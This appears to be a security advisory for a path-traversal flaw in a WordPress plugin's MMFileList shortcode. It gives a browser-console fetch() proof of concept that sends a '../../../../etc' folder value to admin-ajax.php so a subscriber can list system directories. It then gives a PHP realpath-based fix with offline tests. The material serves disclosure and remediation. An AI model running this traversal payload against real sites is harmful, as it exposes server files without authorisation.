Description: The plugin does not validate the generated path from which it lists files, allowing any authenticated user, such as a subscriber, to list the contents of arbitrary directories.
Run the command below in the developer console of the web browser while logged in to the blog as a subscriber user:
fetch("/wp-admin/admin-ajax.php", {
    "headers": {
        "content-type": "application/x-www-form-urlencoded",
    },
    "method": "POST",
    "body": 'action=parse-media-shortcode&shortcode=[MMFileList folder="../../../../../../../../../../etc" format="table" types"" headings=""]',
    "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));
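The root cause is that the folder attribute is joined onto a base directory without checking where the resulting path ends up. Below is an added example of the kind of check a plugin author would want in the shortcode handler; it is not the plugin's own code, and the function name, base directory and the constructed directory layout are assumptions for illustration.

```php
<?php
// Added example (hypothetical helper, not the plugin's code): resolve a
// user-supplied "folder" attribute and accept it only if its canonical path
// stays inside the allowed base directory.
function mm_resolve_list_dir(string $folder, string $base_dir): ?string
{
    $base = realpath($base_dir);
    if ($base === false || !is_dir($base)) {
        return null;                       // misconfigured base: list nothing
    }
    // Refuse null bytes and absolute paths before touching the filesystem.
    if ($folder === '' || strpos($folder, "\0") !== false
        || $folder[0] === '/' || $folder[0] === '\\') {
        return null;
    }
    // realpath() collapses "..", symlinks and "./" so the prefix check below
    // is made against the directory that would actually be read.
    $candidate = realpath($base . DIRECTORY_SEPARATOR . $folder);
    if ($candidate === false || !is_dir($candidate)) {
        return null;
    }
    // Compare with the separator appended so that "/srv/uploads2" is not
    // accepted as being inside "/srv/uploads".
    if ($candidate !== $base
        && strpos($candidate, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $candidate;
}

// Constructed layout under the temp dir to exercise the check offline.
$root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'mm_demo_' . getmypid();
mkdir($root . '/uploads/photos', 0700, true);
mkdir($root . '/secret', 0700, true);

var_dump(mm_resolve_list_dir('photos', $root . '/uploads'));          // string: .../uploads/photos
var_dump(mm_resolve_list_dir('../secret', $root . '/uploads'));       // NULL: escapes the base
var_dump(mm_resolve_list_dir('../../../../etc', $root . '/uploads')); // NULL: escapes the base
var_dump(mm_resolve_list_dir('/etc', $root . '/uploads'));            // NULL: absolute path

// Clean up the constructed directories.
rmdir($root . '/uploads/photos'); rmdir($root . '/uploads');
rmdir($root . '/secret'); rmdir($root);
```

In the shortcode callback the resolved path, not the raw attribute, is what gets passed to the directory listing, and a NULL result should render nothing rather than fall back to the base directory.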